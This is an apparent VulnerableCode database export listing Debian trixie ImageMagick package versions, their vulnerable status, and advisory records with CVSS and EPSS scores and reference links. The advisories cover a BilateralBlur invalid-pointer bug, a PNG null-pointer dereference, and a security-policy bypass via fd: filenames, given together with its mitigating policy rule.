resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-40169, GHSA-5592-p365-24xh

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4s37-h3p7-6uab

url VCID-569d-6nue-5kbq

vulnerability_id VCID-569d-6nue-5kbq

summary

ImageMagick releases an invalid pointer in BilateralBlur when memory allocation fails
The BilateralBlurImage method will allocate a set of double buffers inside AcquireBilateralTLS. But the last element in the set is not properly initialized. This will result in a release of an invalid pointer inside DestroyBilateralTLS when the memory allocation fails.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-22770.json

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-22770.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-22770

reference_id

reference_type

scores

value	0.00067
scoring_system	epss
scoring_elements	0.20647
published_at	2026-04-26T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.2097
published_at	2026-04-02T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.21028
published_at	2026-04-04T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20743
published_at	2026-04-07T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20822
published_at	2026-04-08T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20883
published_at	2026-04-09T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20898
published_at	2026-04-11T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20855
published_at	2026-04-12T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20803
published_at	2026-04-13T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20793
published_at	2026-04-16T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20785
published_at	2026-04-18T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.2077
published_at	2026-04-21T12:55:00Z

value	0.00067
scoring_system	epss
scoring_elements	0.20651
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-22770

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/3e0330721020e0c5bb52e4b77c347527dd71658e

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-21T20:05:17Z/

url

https://github.com/ImageMagick/ImageMagick/commit/3e0330721020e0c5bb52e4b77c347527dd71658e

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-39h3-g67r-7g3c

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-21T20:05:17Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-39h3-g67r-7g3c

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-22770

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-22770

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126074
reference_id	1126074
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126074

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2431037
reference_id	2431037
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2431037

reference_url

https://github.com/advisories/GHSA-39h3-g67r-7g3c

reference_id

GHSA-39h3-g67r-7g3c

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-39h3-g67r-7g3c

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.13%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.13%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.13%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-22770, GHSA-39h3-g67r-7g3c

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-569d-6nue-5kbq

url VCID-5jx9-7bd4-f3hk

vulnerability_id VCID-5jx9-7bd4-f3hk

summary ImageMagick: Null-Pointer dereference in WriteOnePNGImage function in coders/png.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11522.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11522.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-11522

reference_id

reference_type

scores

value	0.00358
scoring_system	epss
scoring_elements	0.57912
published_at	2026-04-01T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.57996
published_at	2026-04-02T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58018
published_at	2026-04-04T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.57993
published_at	2026-04-07T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58048
published_at	2026-04-08T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58051
published_at	2026-04-09T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58068
published_at	2026-04-11T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58045
published_at	2026-04-12T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58024
published_at	2026-04-13T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58054
published_at	2026-04-18T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58032
published_at	2026-04-21T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.57997
published_at	2026-04-24T12:55:00Z

value	0.00358
scoring_system	epss
scoring_elements	0.58011
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-11522

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1474851
reference_id	1474851
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1474851

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-11522

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5jx9-7bd4-f3hk

url VCID-5xqd-gf3b-4ygw

vulnerability_id VCID-5xqd-gf3b-4ygw

summary

ImageMagick's Security Policy Bypass through config/policy-secure.xml via "fd handler" leads to stdin/stdout access
The shipped “secure” security policy includes a rule intended to prevent reading/writing from standard streams:

```xml
<policy domain="path" rights="none" pattern="-"/>
```

However, ImageMagick also supports fd:<n> pseudo-filenames (e.g., fd:0, fd:1). This path form is not blocked by the secure policy templates, and therefore bypasses the protection goal of “no stdin/stdout”.

To resolve this, users can add the following change to their security policy.

```xml
<policy domain="path" rights="none" pattern="fd:*"/>
```

And this will also be included in ImageMagick's more secure policies by default.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25966.json

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25966.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-25966

reference_id

reference_type

scores

value	0.00015
scoring_system	epss
scoring_elements	0.03335
published_at	2026-04-02T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00352
published_at	2026-04-24T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00332
published_at	2026-04-18T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00328
published_at	2026-04-16T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00334
published_at	2026-04-13T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00338
published_at	2026-04-11T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.0034
published_at	2026-04-09T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00342
published_at	2026-04-07T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00355
published_at	2026-04-04T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00337
published_at	2026-04-12T12:55:00Z

value	6e-05
scoring_system	epss
scoring_elements	0.00351
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-25966

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
